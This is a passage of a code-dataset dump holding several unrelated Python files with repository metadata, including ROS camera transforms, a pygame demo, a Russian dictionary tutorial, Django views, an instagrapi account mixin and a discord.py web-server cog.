1. ]])\n \n c4ColorOpticalFrame_to_c4Link_pos = np.asarray([0.015, 0.000, 0.000])\n c4ColorOpticalFrame_to_c4Link_rot = tf.transformations.quaternion_matrix(np.asarray([0.506, -0.495, 0.504, 0.495]))\n c4ColorOpticalFrame_to_c4Link = c4ColorOpticalFrame_to_c4Link_rot\n c4ColorOpticalFrame_to_c4Link[:3, 3] = c4ColorOpticalFrame_to_c4Link_pos\n\n c1Link_to_c4ColorOpticalFrame = np.dot(c1Link_to_c1ColorOpticalFrame, tf.transformations.inverse_matrix(c1_to_c4_mat))\n c1Link_to_c4Link = np.dot(c1Link_to_c4ColorOpticalFrame, c4ColorOpticalFrame_to_c4Link)\n\n c1Link_to_c4Link_pos = c1Link_to_c4Link[:3, 3]\n c1Link_to_c4Link_quat = tf.transformations.quaternion_from_matrix(c1Link_to_c4Link)\n\n # .................. for camera5 to camera1 ..................................... 
#\n c1_to_c5_mat = np.asarray([[-0.48201458, -0.77182315, 0.41466972, -0.20204585],\n [ 0.63925651, 0.0138576 , 0.7688687 , -0.31471432],\n [-0.59917698, 0.63568624, 0.48671341, 0.18944575],\n [ 0. , 0. , 0. , 1. ]])\n\n c5ColorOpticalFrame_to_c5Link_pos = np.asarray([0.015, 0.000, 0.000])\n c5ColorOpticalFrame_to_c5Link_rot = tf.transformations.quaternion_matrix(np.asarray([0.505, -0.496, 0.500, 0.499]))\n c5ColorOpticalFrame_to_c5Link = c5ColorOpticalFrame_to_c5Link_rot\n c5ColorOpticalFrame_to_c5Link[:3, 3] = c5ColorOpticalFrame_to_c5Link_pos\n\n c1Link_to_c5ColorOpticalFrame = np.dot(c1Link_to_c1ColorOpticalFrame, tf.transformations.inverse_matrix(c1_to_c5_mat))\n c1Link_to_c5Link = np.dot(c1Link_to_c5ColorOpticalFrame, c5ColorOpticalFrame_to_c5Link)\n\n c1Link_to_c5Link_pos = c1Link_to_c5Link[:3, 3]\n c1Link_to_c5Link_quat = tf.transformations.quaternion_from_matrix(c1Link_to_c5Link)\n\n # .................. for camera6 to camera1 ..................................... #\n c1_to_c6_mat = np.asarray([[0.35428684, -0.78506002, 0.50809605, -0.13837108],\n [ 0.82388472, 0.51907469, 0.22754217, -0.13304891],\n [-0.44237406, 0.33799738, 0.83070029, 0.03065303],\n [ 0. , 0. , 0. , 1. ]])\n\n c6ColorOpticalFrame_to_c6Link_pos = np.asarray([0.015, 0.000, 0.000])\n c6ColorOpticalFrame_to_c6Link_rot = tf.transformations.quaternion_matrix(np.asarray([0.505, -0.497, 0.503, 0.495]))\n c6ColorOpticalFrame_to_c6Link = c6ColorOpticalFrame_to_c6Link_rot\n c6ColorOpticalFrame_to_c6Link[:3, 3] = c6ColorOpticalFrame_to_c6Link_pos\n\n c1Link_to_c6ColorOpticalFrame = np.dot(c1Link_to_c1ColorOpticalFrame, tf.transformations.inverse_matrix(c1_to_c6_mat))\n c1Link_to_c6Link = np.dot(c1Link_to_c6ColorOpticalFrame, c6ColorOpticalFrame_to_c6Link)\n\n c1Link_to_c6Link_pos = c1Link_to_c6Link[:3, 3]\n c1Link_to_c6Link_quat = tf.transformations.quaternion_from_matrix(c1Link_to_c6Link)\n\n from IPython import embed; embed()\n\nif __name__ == '__main__':\n main()\n","repo_name":"htung0101/table_dome","sub_path":"backup/tf_cam1_to_cam2.py","file_name":"tf_cam1_to_cam2.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28269730372","text":"import pygame,sys,random\n\npygame.init()\n\nscreen_width,screen_height = 800,600 #\nscreen = pygame.display.set_mode((screen_width,screen_height))\n\nclass Rectangles(pygame.sprite.Sprite):\n def __init__(self,x_pos,y_pos):\n super().__init__()\n self.image = pygame.Surface((50,50))\n self.image.fill('red')\n self.rect = self.image.get_rect(center = (x_pos,y_pos))\n self.speed_x = 4\n self.speed_y = 3\n\n def update(self):\n self.rect.x += self.speed_x\n self.rect.y += self.speed_y\n\n if self.rect.right >= screen_width or self.rect.left <= 0:\n self.speed_x *= -1\n\n if self.rect.bottom >= screen_height or self.rect.top <= 0:\n self.speed_y *= -1\n\n\nplayer_group= pygame.sprite.Group()\nfor i in range(6):\n player = Rectangles(random.randrange(50,screen_width - 50),random.randrange(50,screen_height - 50))\n player_group.add(player)\n\nclock = pygame.time.Clock()\nwhile True:\n screen.fill((0,0,0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n player_group.draw(screen)\n player_group.update()\n\n pygame.display.update()\n 
clock.tick(60)\n","repo_name":"rikde1999/GAMES","sub_path":"1-Movements.py","file_name":"1-Movements.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29071218652","text":"#A dictionary is a data type that represents\n#an unordered collection of key:value pairs\n# (where each key, within a single dictionary, is unique).\n#typedef struct {\n#    Py_hash_t me_hash;\n#    PyObject *me_key;\n#    PyObject *me_value;\n#} PyDictKeyEntry;\n\n#Here:\n\n#me_hash is the cached hash code of me_key;\n#*me_key is a pointer to the object holding the entry's key;\n#*me_value is a pointer to the object holding the entry's value.\n\n#Now let us turn to the C structure of the dictionary itself in Python:\n\n#typedef struct {\n#    PyObject_HEAD\n#    Py_ssize_t ma_used;\n#    uint64_t ma_version_tag;\n#    PyDictKeysObject *ma_keys;\n#    PyObject **ma_values;\n#} PyDictObject;\n\n#PyObject_HEAD is the header;\n#Py_ssize_t ma_used is the number of entries in the dictionary;\n#uint64_t ma_version_tag is a unique version of the dictionary that changes on every update;\n#PyDictKeysObject *ma_keys is a pointer to the array of keys;\n#PyObject **ma_values is an array of pointers to the values of the keys.\n#If ma_values IS NULL, all key:value pairs are stored in ma_keys.\n\n\n\n#Basic work with dictionaries\n#Declaring a dictionary\n\nexample_dict = {}\nprint(type(example_dict))\nexample_dict_2 = {'keyOne': 'valueFirst', 'keyTwo': 'valueSecond', 'keyThree': 'valueThird'}\nexample_dict_2['keyThree']\n\n\n\n#Besides the literal form, Python also lets you declare dictionaries with the dict() function:\ninventory_dict = dict(right_hand='sword', left_hand='shield')\ninventory_dict\n\n\n\n#Option 1.\n#If you need a dictionary in which every key is mapped to one and the same value,\n# you can use the fromkeys() method:\n\n# a dictionary of four elements whose values all equal 0\nzero_array_dict = dict.fromkeys(['a0', 'b0', 'c0', 'd0'], 0)\nzero_array_dict\n\n\n\n#Option 2.\n#With the packing function zip() called inside dict(),\n#you can build a dictionary out of two lists (if the list lengths differ, the function trims the extra elements on its own):\n\nkey_list = ['marvel_hero', 'dc_hero']\nvalue_list = ['Spiderman', 'Flash']\nsuperhero_dict = dict(zip(key_list, value_list))\nsuperhero_dict\nprint((superhero_dict))\n\n\n\n\n\n#Accessing a dictionary element in Python\n#The value of a dictionary element can be retrieved in only one way: by addressing it through its key:\nhero_inventory = dict(strong_right_hand='sword', strong_left_hand='shield +3')\nwhat_in_right_hand = hero_inventory['strong_right_hand']\n# or like this: what_in_right_hand = hero_inventory.get('strong_right_hand')\nprint(what_in_right_hand)\n\n\n#Unlike lists, dictionaries have no positional indices\n#Adding a new element to a dictionary\nsuperhero_dict = {'dc_hero': 'Flash'}\n\nsuperhero_dict['dark_horse_hero'] = 'Hellboy'\nprint(superhero_dict)\n#In the same way you can replace an existing value by its key:\nsuperhero_dict['dc_hero'] = 'Batwoman'\nprint(superhero_dict)\n\n\n\n#Removing an element from a dictionary\n#To remove an entry from a dictionary, we use the del operator:\n# the entry \"'dark_horse_hero': 'Hellboy'\" will disappear. Sorry, Red!\ndel superhero_dict['dark_horse_hero']\nprint(superhero_dict)\n\n
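#(Editor's note: a short illustrative addition, not part of the original lesson.\n#del raises a KeyError when the key is absent; dict.pop() with a default avoids that.)\nremoved = superhero_dict.pop('dark_horse_hero', None)\nprint(removed)  # None: the key was already deleted above, and no exception is raised\n\n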
#Checking for the presence of a key in a Python dictionary\n#As noted above, addressing a non-existent key raises an error in the interpreter.\n#So the presence of a key in a dictionary should be checked. The in operator is in charge of that:\nif 'marvel_hero' in superhero_dict:\n    print(\"Yes, such a key exists\")\nelse:\n    print(\"This key is absent from the dictionary!\")\n\n\n#Length of a dictionary in Python\n#Keep in mind that a dictionary is merely a set of mappings, not a sequence,\n#but we can still get the number of its entries with the len() function:\ntreasure = dict(t1='gold', t2='necklace')\nnum_of_items = len(treasure)\nprint(num_of_items)\n\n\n\n\n#Sorting a dictionary\n#Sorting by key\n#Sorting by keys is done with the sorted() function. The function works like this:\nstatistic_dict = {'b': 13, 'd': 30, 'e': -32, 'c': 93, 'a': 33}\nfor key in sorted(statistic_dict):\n    print(key)\n\n\n#Sorting by value\n#And here is one of the ways to sort a dictionary by its values:\nelements = {'el1': 1, 'el2': 0, 'el3': -2, 'el4': 95, 'el5': 13}\nfor key, val in sorted(elements.items(), key= lambda x: x[1]):\n    print(val)\n#Bear in mind that, by itself, the expression sorted(elements.items(), key= lambda x: x[1])\n#returns not a dictionary but a sorted list of tuples. So a more correct variant is:\nelements = {'el1': 1, 'el2': 0, 'el3': -2, 'el4': 95, 'el5': 13}\nelements_sorted = {k: elements[k] for k in sorted(elements, key=elements.get, reverse=True)}\nprint(elements_sorted)\n\n
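#(Editor's note: a short illustrative addition, not part of the original lesson.\n#operator.itemgetter(1) is a common equivalent of the lambda key function used above.)\nfrom operator import itemgetter\nfor key, val in sorted(elements.items(), key=itemgetter(1)):\n    print(key, val)\n\n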
#Iterating over a dictionary in Python\n#It is no great secret that a dictionary, being in essence\n#a set of pairs (i.e. a collection), can be iterated in all sorts of ways. One way is to iterate over the keys:\niter_dict = {'key_b': 1, 'key_d': 0, 'key_e': -2, 'key_c': 95, 'key_a': 13}\nfor key in iter_dict:\n    print(key, end=' ')\n\n#Another way is to iterate with the .items() method.\n#In this case, on every iteration, a key:value pair comes back to us as a tuple ('key', value):\niter_dict = {'key_b': 1, 'key_d': 0, 'key_e': -2, 'key_c': 95, 'key_a': 13}\nfor item in iter_dict.items():\n    print(item, end=' ')\n\n\n\n\n #Finally, we can walk over the values of a dictionary using the neat .values() method:\nln_dict_iter = {'b': 'ln(1)', 'd': 'ln(10)', 'e': 'ln(2)', 'c': 'ln(95)', 'a': 'ln(13)'}\nfor v in ln_dict_iter.values():\n    print(v)\n\n\n\n\n#Merging dictionaries\n#When it comes to merging two dictionaries, it must be mentioned\n #that for a pair of entities of type \"dictionary\" the \"+\" operator is not defined.\n #The reason becomes fairly obvious once you recall\n #that a dictionary is not a sequence, and once you think about\n # exactly which operation on the set of dictionaries this very \"+\" operator would have to implement.\n #So, something like this:\n\ndict_1 = {'010120': 55000, '030420': 8500, '170420': 30000}\ndict_2 = {'050520': 2900, '160520': 16573}\n\n#print(dict_1 + dict_2)#Would be an error!!!!\n\n#But if you still want to get a result and merge two dictionaries after all,\n#it is enough to use the .update() method:\nshowcase_1 = {'Apple': 2.7, 'Grape': 3.5, 'Banana': 4.4}\nshowcase_2 = {'Orange': 1.9, 'Coconut': 10}\nshowcase_1.update(showcase_2)\nprint(showcase_1)\n\n\n#Restrictions\n#When creating a dictionary, you must not forget about certain restrictions imposed, mostly, on its keys.\n\n#The data serving as a dictionary key must be unique within the set of keys of that dictionary.\n#Put simply, there must not be two identical keys;\n#A key must be an object of an immutable type, that is a string, a number or a tuple.\n#Strictly speaking, the object holding the key must be hashable, i.e. have a hash value that does not change during its lifetime;\n#There are no restrictions on values. Maximum freedom.\n#They have to be neither unique nor immutable, so they can afford to be anything at all.\n\n\n\n#Dictionary methods in Python\n#Let us list the main dictionary methods that will help you when working with this data type.\n\n#clear() - empties the given dictionary.\n#get() - returns the dictionary value for the given key. If the key does not exist\n#and a default value is passed as the extra argument, the method returns it. If the default is omitted, the method returns None.\n#items() - returns the dictionary's key:value pairs as the corresponding tuples.\n#keys() - returns a view of the dictionary's keys.\n#values() - similarly, returns a view of the dictionary's values.\n#pop() - removes the dictionary entry by key and returns its value.\n#popitem() - throws a key:value pair out of the dictionary and returns it as a tuple. Such pairs are returned in LIFO order.\n#update() - implements a kind of concatenation for dictionaries. It merges the keys and values of one dictionary with the keys and values of another. If some keys coincide, the resulting value is taken from the dictionary passed as the argument of update.\n#copy() - creates a shallow copy of the original dictionary.\n\n# clear()\nfarewell_dict = {'a': 'word', 'b': 3, 'c': 'x', 'd': 1, 'e': 12}\nfarewell_dict.clear()\nprint(farewell_dict)\n\n
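#(Editor's note: a short illustrative addition, not part of the original lesson,\n#showing get(), pop(), popitem() and copy() on a throwaway dictionary.)\ndemo_dict = {'a': 1, 'b': 2, 'c': 3}\nprint(demo_dict.get('z', 0))   # 0: the default instead of a KeyError\nprint(demo_dict.pop('a'))      # 1: removes the 'a' entry and returns its value\nprint(demo_dict.popitem())     # ('c', 3): removes and returns the most recently added pair\ndemo_copy = demo_dict.copy()   # an independent shallow copy\nprint(demo_copy)               # {'b': 2}\n\n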
#Converting Python dictionaries to other types\n#dict to json\n#To serialize a dictionary into the json format, you first need to import the json module itself:\nimport json\n#dump() lets you convert Python dictionaries into json objects and save them to files on your computer.\n#This is somewhat reminiscent of working with csv.\n#dumps() writes the dictionary into a Python string, but according to the json format.\n\nphonebook = dict(j_row='John Connor', s_row='Sarah Connor')\nphonebook_json = json.dumps(phonebook)\nprint(phonebook_json)\n\n\nprint(type(phonebook_json))\n\n\n\n\n\n\n#dict to list\n#To convert a dict to a list it is enough to iterate the dictionary pairwise with the items() method\n #and, on each iteration, append the key:value pair to a list created beforehand.\n #The output is a list of lists,\n #where each sublist is a pair from the original dictionary.\n\nmedicine_chest = dict(top_part='potion', bot_part='bandage')\nmedicine_list = []\nfor key, con in medicine_chest.items():\n    temp = [key, con]\n    medicine_list.append(temp)\nprint(medicine_list)\n\n\n#dict to string\n#As mentioned above, a dictionary can be turned into a string (str) with the json module.\n#But, if the dictionary is not too big,\n#an equivalent result can be achieved with the standard str() function:\nfood_machine = dict(tier_1='juice', tier_2='chocolate')\nf_machine_str = str(food_machine)\nprint(f_machine_str)\n\n
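#(Editor's note: a short illustrative addition, not part of the original lesson.\n#The str() form above can be parsed back into a dict with ast.literal_eval.)\nimport ast\nrestored_dict = ast.literal_eval(f_machine_str)\nprint(restored_dict == food_machine)  # True: the round trip preserves the data\n\n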
#Dictionary comprehensions\n#Python makes it possible to create dictionaries with comprehensions. They run a loop,\n#pick out key:value pairs on each iteration and thus fill a new dictionary.\n#Let us create a dictionary in which several elements of the natural number series are mapped to their squares:\n\ngenerated_dict_of_squares = {x: x ** 2 for x in [1, 2, 3, 4]}\nprint(generated_dict_of_squares)\n\n\n#A comprehension is also handy when you need to initialize some existing list of keys:\nlist_of_keys = ['q', 'w', 'e', 'r', 't']\ngenerated_dict = {k: 0 for k in list_of_keys}\nprint(generated_dict)\n\n\n\n\n\n#Nested dictionaries\n#It deserves a separate mention that a dictionary element\n#can take another dictionary as its value:\nnesting_d = {'fk': {'input_lvl_one': {'input_lvl_two': 42}}}\nprint(nesting_d['fk']['input_lvl_one']['input_lvl_two'])\n#The number of nesting levels of dictionaries is unlimited!\n","repo_name":"SanchoPanza29/Theory","sub_path":"1 урок Словари.py","file_name":"1 урок Словари.py","file_ext":"py","file_size_in_byte":16084,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28864941375","text":"\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.db import models\nfrom .models import *\nfrom django.db.models import Q\n\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import UserCreationForm\n\nfrom django.utils import timezone\nfrom datetime import timedelta\n\nfrom django.core import serializers\n\n\n# Create your views here.\ndef home(request):\n    search = ''\n    if 'search' in request.GET:\n        search = request.GET.get('search')\n    rooms = Room.objects.filter(Q(search_keyword__icontains=search) |\n                                Q(description__icontains=search) |\n                                Q(host__username=search)\n                                )\n    keywords = Keyword.objects.annotate(\n        total_search=models.Sum('search_keyword_users__total_search')\n    ).all()\n\n    users = User.objects.all()\n\n    now = timezone.now()\n\n    # implement from documentation \n    # today = Keywordsearch.objects.filter(created__lte=now.today())\n    # last_seven_days = Keywordsearch.objects.filter(created__gt=F('created') + timedelta(days=7))\n    \n    result = Keywordsearch.objects.aggregate(\n        total=models.Count('keyword'),\n        today=models.Count('keyword',filter=models.Q(created__date=now.date())),\n        yesterday = models.Count('keyword',filter=models.Q(created__date__gte=(now - timedelta(days=1)).date())),\n        last_seven_days = models.Count('keyword',filter=models.Q(created__date__gte=(now - timedelta(days=7)).date())),\n        last_30_days = models.Count('keyword',filter=models.Q(created__date__gte=(now - timedelta(days=30)).date())),\n    )\n    context = {\n        'rooms': rooms,\n        'keywords': keywords,\n        'users': users,\n        'result':result\n    }\n    return render(request, 'home.html', context)\n\n\n@login_required(login_url='login')\ndef usearch(request):\n    if request.method == \"POST\":\n        # user = request.POST.get('username')\n        user = request.user\n        keyword = request.POST.get('search')\n        print(keyword)\n        try:\n            keyword_obj = Keyword.objects.get(name=keyword)\n            # new_data.save()\n        except Keyword.DoesNotExist:\n            keyword_obj = Keyword.objects.create(name=keyword)\n\n        if keyword_obj:\n\n            try:\n                user_keyword = Keywordsearch.objects.get(keyword=keyword_obj, user=user)\n                user_keyword.total_search += 1\n                user_keyword.save()\n                # new_data.save()\n            except Keywordsearch.DoesNotExist:\n                
Keywordsearch.objects.create(keyword=keyword_obj, user=user, total_search=1)\n\n        return redirect('home')\n\n\ndef loginUser(request):\n    page = 'login'\n    if request.method == 'POST':\n        # get username and password from user input \n        username = request.POST.get('username')\n        password = request.POST.get('password')\n\n        # check whether this user exists or not \n        try:\n            user = User.objects.get(username=username)\n        except:\n            return HttpResponse('User does not exist')\n\n        # if the user exists, make sure the credentials are correct \n        user = authenticate(request, username=username, password=password)\n\n        # log the user in, create the session in the database and redirect to the home page \n        if user is not None:\n            login(request, user)\n            return redirect('home')\n        else:\n            return HttpResponse('Username or Password does not exist')\n\n    context = {'page': page}\n    return render(request, 'login_register.html', context)\n\n\ndef logoutPage(request):\n    logout(request)\n    return redirect('home')\n\n\ndef registerPage(request):\n    form = UserCreationForm()\n    if request.method == 'POST':\n        form = UserCreationForm(request.POST)\n        if form.is_valid():\n            user = form.save(commit=False)\n            user.username = user.username.lower()\n            user.save()\n            login(request, user)\n            return redirect('home')\n        else:\n            return HttpResponse('An error occurred during registration')\n\n    context = {'form': form}\n    return render(request, 'login_register.html', context)\n\n\ndef showusername(request):\n    all_users = User.objects.all()\n    context = {\n        'all_users': all_users\n    }\n    return render(request, 'home.html', context)\n\n\ndef everyusersearch(request,pk):\n    user = User.objects.get(id=pk)\n    user_srch = user.search_keywords.all()\n    # print(user_srch)\n    context = {\n        'user_search':user_srch\n    }\n    return render(request, 'all_user.html', context)\n\n\n# try for js/ajax\ndef tuto(request,pk):\n    user = User.objects.get(id=pk)\n    tasks= user.search_keywords.all()\n    \n    if request.is_ajax():\n        task_serializers = serializers.serialize('json', tasks)\n        return JsonResponse(task_serializers, safe=False)\n    return JsonResponse({'message':'Wrong validation'})\n","repo_name":"abbappii/User-Search-History-Project","sub_path":"search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20851684324","text":"from json.decoder import JSONDecodeError\nfrom pathlib import Path\nfrom typing import Dict\n\nimport requests\n\nfrom instagrapi.exceptions import ClientError, ClientLoginRequired\nfrom instagrapi.extractors import extract_account, extract_user_short\nfrom instagrapi.types import Account, UserShort\nfrom instagrapi.utils import dumps, gen_token\n\n\nclass AccountMixin:\n    \"\"\"\n    Helper class to manage your account\n    \"\"\"\n\n    def reset_password(self, username: str) -> Dict:\n        \"\"\"\n        Reset your password\n\n        Returns\n        -------\n        Dict\n            Jsonified response from Instagram\n        \"\"\"\n        response = requests.post(\n            \"https://www.instagram.com/accounts/account_recovery_send_ajax/\",\n            data={\"email_or_username\": username, \"recaptcha_challenge_field\": \"\"},\n            headers={\n                \"x-requested-with\": \"XMLHttpRequest\",\n                \"x-csrftoken\": gen_token(),\n                \"Connection\": \"Keep-Alive\",\n                \"Accept\": \"*/*\",\n                \"Accept-Encoding\": \"gzip,deflate\",\n                \"Accept-Language\": \"en-US\",\n                \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15\",\n            },\n            proxies=self.public.proxies,\n            
timeout=self.request_timeout,\n )\n try:\n return response.json()\n except JSONDecodeError as e:\n if \"/login/\" in response.url:\n raise ClientLoginRequired(e, response=response)\n raise ClientError(e, response=response)\n\n def account_info(self) -> Account:\n \"\"\"\n Fetch your account info\n\n Returns\n -------\n Account\n An object of Account class\n \"\"\"\n result = self.private_request(\"accounts/current_user/?edit=true\")\n return extract_account(result[\"user\"])\n\n def set_external_url(self, external_url) -> dict:\n \"\"\"\n Set new biography\n \"\"\"\n\n signed_body = f\"signed_body=SIGNATURE.%7B%22updated_links%22%3A%22%5B%7B%5C%22url%5C%22%3A%5C%22{external_url}%5C%22%2C%5C%22title%5C%22%3A%5C%22%5C%22%2C%5C%22link_type%5C%22%3A%5C%22external%5C%22%7D%5D%22%2C%22_uid%22%3A%22{self.user_id}%22%2C%22_uuid%22%3A%22{self.uuid}%22%7D\"\n return self.private_request(\n \"accounts/update_bio_links/\", data=signed_body, with_signature=False\n )\n\n def account_set_private(self) -> bool:\n \"\"\"\n Sets your account private\n\n Returns\n -------\n Account\n An object of Account class\n \"\"\"\n assert self.user_id, \"Login required\"\n user_id = str(self.user_id)\n data = self.with_action_data({\"_uid\": user_id, \"_uuid\": self.uuid})\n result = self.private_request(\"accounts/set_private/\", data)\n return result[\"status\"] == \"ok\"\n\n def account_set_public(self) -> bool:\n \"\"\"\n Sets your account public\n\n Returns\n -------\n Account\n An object of Account class\n \"\"\"\n assert self.user_id, \"Login required\"\n user_id = str(self.user_id)\n data = self.with_action_data({\"_uid\": user_id, \"_uuid\": self.uuid})\n result = self.private_request(\"accounts/set_public/\", data)\n return result[\"status\"] == \"ok\"\n\n def account_security_info(self) -> dict:\n \"\"\"\n Fetch your account security info\n\n Returns\n -------\n dict\n Contains useful information on security settings: {\n \"is_phone_confirmed\": true,\n \"is_two_factor_enabled\": false,\n \"is_totp_two_factor_enabled\": true,\n \"is_trusted_notifications_enabled\": true,\n \"is_eligible_for_whatsapp_two_factor\": true,\n \"is_whatsapp_two_factor_enabled\": false,\n \"backup_codes\": [...],\n \"trusted_devices\": [],\n \"has_reachable_email\": true,\n \"eligible_for_trusted_notifications\": true,\n \"is_eligible_for_multiple_totp\": false,\n \"totp_seeds\": [],\n \"can_add_additional_totp_seed\": false\n }\n \"\"\"\n return self.private_request(\n \"accounts/account_security_info/\", self.with_default_data({})\n )\n\n def account_edit(self, **data: Dict) -> Account:\n \"\"\"\n Edit your profile (authorized account)\n\n Parameters\n ----------\n data: Dict\n Fields you want to edit in your account as key and value pairs\n\n Returns\n -------\n Account\n An object of Account class\n \"\"\"\n fields = (\n \"external_url\",\n \"username\",\n \"full_name\",\n \"biography\",\n \"phone_number\",\n \"email\",\n )\n # if \"email\" in data:\n # # email is handled separately\n # self.send_confirm_email(data.pop(\"email\"))\n # if \"phone_number\" in data:\n # # phone_number is handled separately\n # self.send_confirm_phone_number(data.pop(\"phone_number\"))\n data = {key: val for key, val in data.items() if key in fields}\n if \"email\" not in data or \"phone_number\" not in data:\n # Instagram Error: You need an email or confirmed phone number.\n user_data = self.account_info().dict()\n user_data = {field: user_data[field] for field in fields}\n data = dict(user_data, **data)\n full_name = data.pop(\"full_name\", 
None)\n if full_name:\n # Instagram original field-name for full user name is \"first_name\"\n data[\"first_name\"] = full_name\n # Biography with entities (markup)\n result = self.private_request(\n \"accounts/edit_profile/\", self.with_default_data(data)\n )\n biography = data.get(\"biography\")\n if biography:\n self.account_set_biography(biography)\n return extract_account(result[\"user\"])\n\n def account_set_biography(self, biography: str) -> bool:\n \"\"\"\n Set biography with entities (markup)\n\n Parameters\n ----------\n biography: str\n Biography raw text\n\n Returns\n -------\n bool\n A boolean value\n \"\"\"\n data = {\"logged_in_uids\": dumps([str(self.user_id)]), \"raw_text\": biography}\n result = self.private_request(\n \"accounts/set_biography/\", self.with_default_data(data)\n )\n return result[\"status\"] == \"ok\"\n\n def account_change_picture(self, path: Path) -> UserShort:\n \"\"\"\n Change photo for your profile (authorized account)\n\n Parameters\n ----------\n path: Path\n Path to the image you want to update as your profile picture\n\n Returns\n -------\n UserShort\n An object of UserShort class\n \"\"\"\n upload_id, _, _ = self.photo_rupload(Path(path))\n result = self.private_request(\n \"accounts/change_profile_picture/\",\n self.with_default_data({\"use_fbuploader\": True, \"upload_id\": upload_id}),\n )\n return extract_user_short(result[\"user\"])\n\n def news_inbox_v1(self, mark_as_seen: bool = False) -> dict:\n \"\"\"\n Get old and new stories as is\n\n Parameters\n ----------\n mark_as_seen: bool\n Mark as seen or not\n\n Returns\n -------\n dict\n \"\"\"\n return self.private_request(\n \"news/inbox/\", params={\"mark_as_seen\": mark_as_seen}\n )\n\n def send_confirm_email(self, email: str) -> dict:\n \"\"\"\n Send confirmation code to new email address\n\n Parameters\n ----------\n email: str\n Email address\n\n Returns\n -------\n dict\n \"\"\"\n return self.private_request(\n \"accounts/send_confirm_email/\",\n self.with_extra_data(\n {\"send_source\": \"personal_information\", \"email\": email}\n ),\n )\n\n def send_confirm_phone_number(self, phone_number: str) -> dict:\n \"\"\"\n Send confirmation code to new phone number\n\n Parameters\n ----------\n phone_number: str\n Phone number\n\n Returns\n -------\n dict\n \"\"\"\n return self.private_request(\n \"accounts/initiate_phone_number_confirmation/\",\n self.with_extra_data(\n {\n \"android_build_type\": \"release\",\n \"send_source\": \"edit_profile\",\n \"phone_number\": phone_number,\n }\n ),\n )\n","repo_name":"adw0rd/instagrapi","sub_path":"instagrapi/mixins/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":8682,"program_lang":"python","lang":"en","doc_type":"code","stars":2300,"dataset":"github-code","pt":"52"} +{"seq_id":"38047791779","text":"import os\n\nfrom aiohttp import web\nfrom discord.ext import commands, tasks\n\n\nclass Flare(commands.Cog):\n def __init__(self, bot):\n self.bot: commands.Bot = bot\n self.web_server.start()\n self.app = web.Application()\n self.routes = web.RouteTableDef()\n\n @self.routes.get(os.environ.get('FLARE_PATH', \"/\"))\n async def welcome(request):\n return web.Response(text=\"Bot is Online!!\")\n\n self.webserver_port = os.environ.get('FLARE_PORT', 5000)\n self.app.add_routes(self.routes)\n\n @tasks.loop()\n async def web_server(self):\n runner = web.AppRunner(self.app)\n await runner.setup()\n site = web.TCPSite(runner, host=os.environ.get(\"FLARE_HOST\", None), port=self.webserver_port)\n await site.start()\n\n 
@web_server.before_loop\n async def web_server_before_loop(self):\n await self.bot.wait_until_ready()\n","repo_name":"Cobular/Flare-DiscordPy","sub_path":"flare/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40701000649","text":"# -*- coding: utf-8 -*-\n\"\"\"Migration to change sr-Cyrl locale to sr locale\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef change_locale_sr_Cyrl_to_sr_forwards(apps, schema_editor):\n\tDocument = apps.get_model(\"wiki\", \"Document\")\n\tLocale = apps.get_model(\"wiki\", \"Locale\")\n\tDocument.objects.filter(locale='sr-Cyrl').update(locale='sr')\n\tLocale.objects.filter(locale='sr-Cyrl').update(locale='sr')\n\ndef change_locale_sr_Cyrl_to_sr_backwards(apps, schema_editor):\n\tDocument = apps.get_model(\"wiki\", \"Document\")\n\tLocale = apps.get_model(\"wiki\", \"Locale\")\n\tDocument.objects.filter(locale='sr').update(locale='sr-Cyrl')\n\tLocale.objects.filter(locale='sr').update(locale='sr-Cyrl')\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('wiki', '0003_add_related_documents_field'),\n ]\n\n operations = [\n migrations.RunPython(change_locale_sr_Cyrl_to_sr_forwards, change_locale_sr_Cyrl_to_sr_backwards),\n ]\n","repo_name":"feer56/Kitsune2","sub_path":"kitsune/wiki/migrations/0004_change_locale_sr_Cyrl_to_sr.py","file_name":"0004_change_locale_sr_Cyrl_to_sr.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39530401419","text":"class Solution:\n def surfaceArea(self, grid: List[List[int]]) -> int:\n \n top_down = sum([sum(i > 0 for i in row) for row in grid]) * 2\n sides = sum([sum(i for i in row) for row in grid]) * 4\n \n hor_adj = sum([adjecent(row) for row in grid])\n ver_adj = sum([adjecent(row) for row in zip(*grid)])\n \n return top_down + sides - hor_adj - ver_adj\n \ndef adjecent(row: list[int]) -> int:\n\n total = 0\n\n for i in range(len(row)-1):\n if row[i] and row[i+1]:\n total += min(row[i], row[i+1]) * 2\n return total","repo_name":"IzzeddinTeeti/LeetCodeSolutions","sub_path":"892-surface-area-of-3d-shapes/892-surface-area-of-3d-shapes.py","file_name":"892-surface-area-of-3d-shapes.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31703254619","text":"employees = [\n (\"jack shephard\", \"Sales\", 100000, 1978, True),\n (\"kate austen\", \"IT\", 200000, 1985, False),\n (\"ben linus\", \"Finance\", 150000, 1967, True),\n 